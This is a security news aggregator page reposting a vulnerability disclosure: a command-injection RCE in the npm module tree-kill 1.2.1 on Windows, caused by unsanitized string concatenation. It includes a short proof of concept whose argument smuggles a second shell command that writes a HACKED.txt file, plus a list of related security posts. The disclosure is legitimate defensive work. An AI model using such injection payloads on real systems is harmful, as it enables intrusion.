logo
 
  1. Reverse Engineering >
  2. Exploits >
  3. Node.js third-party modules: [tree-kill] RCE via insecure command concatenation (only Windows)


ArabicEnglishFrenchGermanGreekItalianJapaneseKoreanPersianPolishPortugueseRussianSpanishTurkishVietnamese

Node.js third-party modules: [tree-kill] RCE via insecure command concatenation (only Windows)


Exploits vom | Direktlink: vulners.com Nachrichten Bewertung


image
I would like to report a RCE issue in the tree-kill module. It allows to execute arbitrary commands remotely inside the victim's PC Module module name: tree-kill version: 1.2.1 npm page: https://www.npmjs.com/package/tree-kill Module Description Kill all processes in the process tree, including the root process. Module Stats [N/A] downloads in the last day [2,108,440] downloads in the last week [~10M] downloads in the last month Vulnerability Description The issue occurs because a user input is concatenated with a command that will be executed without any check. The issue arises here: https://github.com/pkrumins/node-tree-kill/blob/master/index.js#L20 (as you can see, the Linux part is sanitized, while the Win one no ... it simply uses the + operand to concatenate the input) Steps To Reproduce: Create the following PoC file: js // poc.js var kill = require('tree-kill'); kill('3333332 & echo "HACKED" > HACKED.txt & '); 1. Execute the following commands in another terminal: bash npm i tree-kill # Install affected module dir # Check *HACKED.txt* doesn't exist node poc.js # Run the PoC dir # Now *HACKED.txt* exists :) 1. A new file called HACKED.txt will be created, containing the HACKED string Note I can't provide a screenshot as I'm working on Linux (I'll be able to reinstall win only the next week), but the code showed in the module (line 20) makes clear the attack is possible. Pls note I'm not sure of the batch syntax used , as said I can't verify it on a win machine.......

https://vulners.com/hackerone/H1:701183?utm_source=rss&utm_medium=rss&utm_campaign=rss

Externe Webseite mit kompletten Inhalt öffnen

➤ Ähnliche Beiträge

  • 1.

    Crypton - Library Consisting Of Explanation And Implementation Of All The Existing Attacks On Various Encryption Systems, Digital Signatures, Hashing Algorithms

    vom 453.55 Punkte ic_school_black_18dp
    Crypton is an educational library to learn and practice Offensive and Defensive Cryptography. It is basically a collection of explanation and implementation of all the existing vulnerabilities and attacks on various Encryption Systems (Symmetric and Asymmetric), Digital Signatures, Message Authentication Codes and Authenticated
  • 2.

    The May 2019 Security Update Review

    vom 385.24 Punkte ic_school_black_18dp
    May is here and so are the scheduled security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month.   Adobe Patches for May 2019 This month, Ad
  • 3.

    Venom - A Multi-hop Proxy For Penetration Testers

    vom 338.34 Punkte ic_school_black_18dp
    Venom is a multi-hop proxy tool developed for penetration testers using Go. You can use venom to easily proxy network traffic to a multi-layer intranet, and easily manage intranet nodes.Features network topology multi-hop socks5 proxy multi-hop port forward port r
  • 4.

    The August 2019 Security Update Review

    vom 328.94 Punkte ic_school_black_18dp
    August is here and it brings with it the scheduled security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month.   Adobe Patches for August 2019 Adobe relea
  • 5.

    The February 2019 Security Update Review

    vom 323.88 Punkte ic_school_black_18dp
    February is here and with it comes the latest in security offerings from Adobe and Microsoft. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for February 2019
  • 6.

    The February 2019 Security Update Review

    vom 323.88 Punkte ic_school_black_18dp
    February is here and with it comes the latest in security offerings from Adobe and Microsoft. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for February 2019
  • 7.

    The June 2019 Security Update Review

    vom 314.27 Punkte ic_school_black_18dp
    June has arrived and so have the scheduled security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for June 2019 This month, A
  • 8.

    The July 2019 Security Update Review

    vom 313.64 Punkte ic_school_black_18dp
    July has arrived and so have the scheduled security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for July 2019 Adobe release
  • 9.

    The November 2018 Security Update Review

    vom 265.16 Punkte ic_school_black_18dp
    November is here and with it comes the latest in security offerings from Adobe and Microsoft. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for November 2018
  • 10.

    The September 2019 Security Update Review

    vom 256.32 Punkte ic_school_black_18dp
    September is upon us and with it brings the latest security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month.   Adobe Patches for September 2019 Adobe ha
  • 11.

    Scanner-Cli - A Project Security/Vulnerability/Risk Scanning Tool

    vom 253.21 Punkte ic_school_black_18dp
    The Hawkeye scanner-cli is a project security, vulnerability and general risk highlighting tool. It is meant to be integrated into your pre-commit hooks and your pipelines.Running and configuring the scannerThe Hawkeye scanner-cli assumes that your dir
  • 12.

    P4wnP1 A.L.O.A. - Framework Which Turns A Rapsberry Pi Zero W Into A Flexible, Low-Cost Platform For Pentesting, Red Teaming And Physical Engagements

    vom 241.35 Punkte ic_school_black_18dp
    P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".0. How to installThe latest image could be fo

Kommentare ber Node.js third-party modules: [tree-kill] RCE via insecure command concatenation (only Windows)